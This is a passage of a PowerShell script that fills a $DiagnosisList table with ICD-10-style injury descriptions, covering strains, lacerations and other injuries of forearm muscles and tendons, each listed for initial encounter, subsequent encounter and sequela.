extensor muscle, fascia and tendon of right little finger at forearm level","Strain of extensor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of right little finger at forearm level","Strain of extensor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at forearm level","Strain of extensor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at forearm level","Strain of extensor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of left little finger at forearm level","Strain of extensor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level","Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level","Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level","Strain of extensor muscle, fascia and tendon of finger, unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at forearm level","Laceration of extensor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at forearm level","Laceration of extensor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right index finger at forearm level","Laceration of extensor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at forearm level","Laceration of extensor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at forearm level","Laceration of extensor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left index finger at forearm level","Laceration of extensor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level","Laceration of extensor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level","Laceration of extensor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at forearm level","Laceration of extensor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at forearm level","Laceration of extensor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of right little finger at forearm level","Laceration of extensor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at forearm level","Laceration of extensor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at forearm level","Laceration of extensor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of left little finger at forearm level","Laceration of extensor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level","Laceration of extensor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at forearm level","Other injury of extensor muscle, fascia and tendon of right index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at forearm level","Other injury of extensor muscle, fascia and tendon of right index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right index finger at forearm level","Other injury of extensor muscle, fascia and tendon of right index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at forearm level","Other injury of extensor muscle, fascia and tendon of left index finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at forearm level","Other injury of extensor muscle, fascia and tendon of left index finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left index finger at forearm level","Other injury of extensor muscle, fascia and tendon of left index finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of right middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level","Other injury of extensor muscle, fascia and tendon of left middle finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of right ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level","Other injury of extensor muscle, fascia and tendon of left ring finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at forearm level","Other injury of extensor muscle, fascia and tendon of right little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at forearm level","Other injury of extensor muscle, fascia and tendon of right little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of right little finger at forearm level","Other injury of extensor muscle, fascia and tendon of right little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at forearm level","Other injury of extensor muscle, fascia and tendon of left little finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at forearm level","Other injury of extensor muscle, fascia and tendon of left little finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of left little finger at forearm level","Other injury of extensor muscle, fascia and tendon of left little finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level","Other injury of extensor muscle, fascia and tendon of unspecified finger at forearm level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Unspecified injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, right arm","Strain of other extensor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, right arm","Strain of other extensor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, right arm","Strain of other extensor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, left arm","Strain of other extensor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, left arm","Strain of other extensor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, left arm","Strain of other extensor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Strain of other extensor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, right arm","Laceration of other extensor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, right arm","Laceration of other extensor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, right arm","Laceration of other extensor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, left arm","Laceration of other extensor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, left arm","Laceration of other extensor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, left arm","Laceration of other extensor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Laceration of other extensor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, right arm","Other injury of other extensor muscle, fascia and tendon at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, right arm","Other injury of other extensor muscle, fascia and tendon at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, right arm","Other injury of other extensor muscle, fascia and tendon at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, left arm","Other injury of other extensor muscle, fascia and tendon at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, left arm","Other injury of other extensor muscle, fascia and tendon at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, left arm","Other injury of other extensor muscle, fascia and tendon at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm","Other injury of other extensor muscle, fascia and tendon at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, right arm","Unspecified injury of other muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, right arm","Unspecified injury of other muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, right arm","Unspecified injury of other muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, left arm","Unspecified injury of other muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, left arm","Unspecified injury of other muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, left arm","Unspecified injury of other muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of other muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, right arm","Strain of other muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, right arm","Strain of other muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, right arm","Strain of other muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, left arm","Strain of other muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, left arm","Strain of other muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, left arm","Strain of other muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, unspecified arm","Strain of other muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, unspecified arm","Strain of other muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other muscles, fascia and tendons at forearm level, unspecified arm","Strain of other muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, right arm","Laceration of other muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, right arm","Laceration of other muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, right arm","Laceration of other muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, left arm","Laceration of other muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, left arm","Laceration of other muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, left arm","Laceration of other muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, unspecified arm","Laceration of other muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, unspecified arm","Laceration of other muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other muscles, fascia and tendons at forearm level, unspecified arm","Laceration of other muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, right arm","Other injury of other muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, right arm","Other injury of other muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, right arm","Other injury of other muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, left arm","Other injury of other muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, left arm","Other injury of other muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, left arm","Other injury of other muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, unspecified arm","Other injury of other muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, unspecified arm","Other injury of other muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other muscles, fascia and tendons at forearm level, unspecified arm","Other injury of other muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Unspecified injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, right arm","Strain of unspecified muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, right arm","Strain of unspecified muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, right arm","Strain of unspecified muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, left arm","Strain of unspecified muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, left arm","Strain of unspecified muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, left arm","Strain of unspecified muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Strain of unspecified muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, right arm","Laceration of unspecified muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, right arm","Laceration of unspecified muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, right arm","Laceration of unspecified muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, left arm","Laceration of unspecified muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, left arm","Laceration of unspecified muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, left arm","Laceration of unspecified muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Laceration of unspecified muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, right arm","Other injury of unspecified muscles, fascia and tendons at forearm level, right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, right arm","Other injury of unspecified muscles, fascia and tendons at forearm level, right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, right arm","Other injury of unspecified muscles, fascia and tendons at forearm level, right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, left arm","Other injury of unspecified muscles, fascia and tendons at forearm level, left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, left arm","Other injury of unspecified muscles, fascia and tendons at forearm level, left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, left arm","Other injury of unspecified muscles, fascia and tendons at forearm level, left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm","Other injury of unspecified muscles, fascia and tendons at forearm level, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified elbow","Crushing injury of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified elbow","Crushing injury of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified elbow","Crushing injury of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right elbow","Crushing injury of right 